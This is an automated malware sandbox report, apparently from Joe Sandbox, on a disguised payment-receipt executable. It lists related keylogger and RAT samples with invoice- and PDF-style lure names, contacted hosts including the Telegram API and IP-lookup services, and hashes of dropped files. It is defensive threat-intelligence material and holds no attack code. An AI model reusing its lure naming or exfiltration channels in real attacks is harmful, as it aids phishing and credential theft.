                                                                                                                      • Number of non-executed functions: 110
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe

                                                                                                                      Warnings

                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                      • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7528 because it is empty
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                      • VT rate limit hit for: Justificante pago-09453256434687.exe

                                                                                                                      Simulations

                                                                                                                      Behavior and APIs

                                                                                                                      TimeTypeDescription
                                                                                                                      12:28:01API Interceptor39x Sleep call for process: powershell.exe modified
                                                                                                                      12:28:54API Interceptor5035x Sleep call for process: msiexec.exe modified

                                                                                                                      Joe Sandbox View / Context

                                                                                                                      IPs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      149.154.167.220l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                                        l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                                          pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                            QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                              FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                    TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                          104.21.67.152pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                              FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                  CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                    TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                          REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                            SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                              158.101.44.242pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • checkip.dyndns.org/
                                                                                                                                                              FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • checkip.dyndns.org/
                                                                                                                                                              REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • checkip.dyndns.org/
                                                                                                                                                              PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              • checkip.dyndns.org/
                                                                                                                                                              REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                              • checkip.dyndns.org/
                                                                                                                                                              Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • checkip.dyndns.org/
                                                                                                                                                              77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • checkip.dyndns.org/
                                                                                                                                                              hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • checkip.dyndns.org/
                                                                                                                                                              hesaphareketi-01.pdfsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • checkip.dyndns.org/
                                                                                                                                                              Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • checkip.dyndns.org/

                                                                                                                                                              Domains

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              checkip.dyndns.compedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 193.122.6.168
                                                                                                                                                              QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 193.122.6.168
                                                                                                                                                              FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 158.101.44.242
                                                                                                                                                              REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 158.101.44.242
                                                                                                                                                              PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                              • 132.226.8.169
                                                                                                                                                              ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                              • 193.122.130.0
                                                                                                                                                              CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 132.226.8.169
                                                                                                                                                              conferma..exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 132.226.8.169
                                                                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 193.122.130.0
                                                                                                                                                              PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              • 158.101.44.242
                                                                                                                                                              reallyfreegeoip.orgpedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              api.telegram.orgl9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                              • 149.154.167.220

                                                                                                                                                              ASNs

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              TELEGRAMRUl9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                                                                                                                                              • 149.154.167.99
                                                                                                                                                              QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                                              • 149.154.167.99
                                                                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              CLOUDFLARENETUShttps://docsend.com/v/ty7vw/up-dateGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 172.67.182.24
                                                                                                                                                              https://yxyz.zyxy.org/awjxs.captcha?u=c450c3eb-f121-4401-970f-d07fe840d263Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.21.25.207
                                                                                                                                                              3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.16.184.241
                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                              • 172.67.164.37
                                                                                                                                                              wf1Ps82LYF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 104.21.50.161
                                                                                                                                                              https://share.hsforms.com/1Izw71u6TTr2VFC-t9f1KFgsvgdjGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.18.142.119
                                                                                                                                                              https://qrs.ly/gggdyxxGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 1.1.1.1
                                                                                                                                                              236236236.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.26.14.131
                                                                                                                                                              https://tinyurl.com/ajdoea10dk66Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.21.96.1
                                                                                                                                                              IMAKBWPY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 172.67.219.27
                                                                                                                                                              ORACLE-BMC-31898USpedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 158.101.44.242
                                                                                                                                                              QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 193.122.6.168
                                                                                                                                                              FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 158.101.44.242
                                                                                                                                                              REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 158.101.44.242
                                                                                                                                                              ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                              • 193.122.130.0
                                                                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 193.122.130.0
                                                                                                                                                              PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              • 158.101.44.242
                                                                                                                                                              SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                              • 193.122.6.168
                                                                                                                                                              REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                              • 158.101.44.242
                                                                                                                                                              arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 147.154.242.4

                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              54328bd36c14bd82ddaa0c04b25ed9adpedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0ehttps://docsend.com/v/ty7vw/up-dateGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              uZgbejeJkT.batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              ni2OwV1y9u.batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              KjECqzXLWp.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              cey4VIyGKh.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19ME-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              09-FD-94.03.60.175.07.xlsx.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              TEC-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              ME-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              09-FD-94.03.60.175.07.xlsx.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              TEC-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              InvoiceNr274728.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                                              • 142.250.181.1
                                                                                                                                                              • 172.217.19.174

                                                                                                                                                              Dropped Files

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\nsj887A.tmp\nsExec.dllpedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                uu8v4UUzTU.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  uu8v4UUzTU.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    https://on-combine-data.s3.us-west-2.amazonaws.com/dealer-data/Share+Point/NTAS_MS3000X_Installer_v2.8.25_October2024_NO_UPS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      https://veryfast.ioGet hashmaliciousUnknownBrowse
                                                                                                                                                                        SecuriteInfo.com.W32.PossibleThreat.20282.14864.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          SecuriteInfo.com.W32.PossibleThreat.20282.14864.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            GrammarlyInstaller.evxSw76fmxki94ued2mj0c82.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              GrammarlyInstaller.evxSw76fmxki94ued2mj0c82.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                https://viture.com/windowsGet hashmaliciousUnknownBrowse

                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:modified
                                                                                                                                                                                  Size (bytes):53158
                                                                                                                                                                                  Entropy (8bit):5.062687652912555
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                                                                                                                  MD5:5D430F1344CE89737902AEC47C61C930
                                                                                                                                                                                  SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                                                                                                                  SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                                                                                                                  SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                  Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ezaarsi.pgc.ps1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvjp41pz.guw.ps1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wch0vq3h.eoa.psm1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xp0zskw3.eft.psm1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\Justificante pago-09453256434687.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (4095), with CRLF, LF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):68206
                                                                                                                                                                                  Entropy (8bit):5.172310613255284
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:JWm6iUoKIuR+xCKKijix19GzuQ47tUbYIj0ghf9:Em6imIuR3Ko194v4pUEiD9
                                                                                                                                                                                  MD5:F508128E1733BB6460B9B1532382ECF6
                                                                                                                                                                                  SHA1:B20F4E4AF3FE86A6DD5B7B10FCF983FAC5BF74C4
                                                                                                                                                                                  SHA-256:85B8BC66A411630746860C471286AB9BBC69BA93212E12DA8E75040DFB3A1A75
                                                                                                                                                                                  SHA-512:ACC7183911452359EC33582CDF6F5FF0953BC4F09F1F5475454D17277466ABC1F9B0218E8177735F9653665FBF55555BD557B86398C3D5A4A0D697B122E81731
                                                                                                                                                                                  Malicious:true
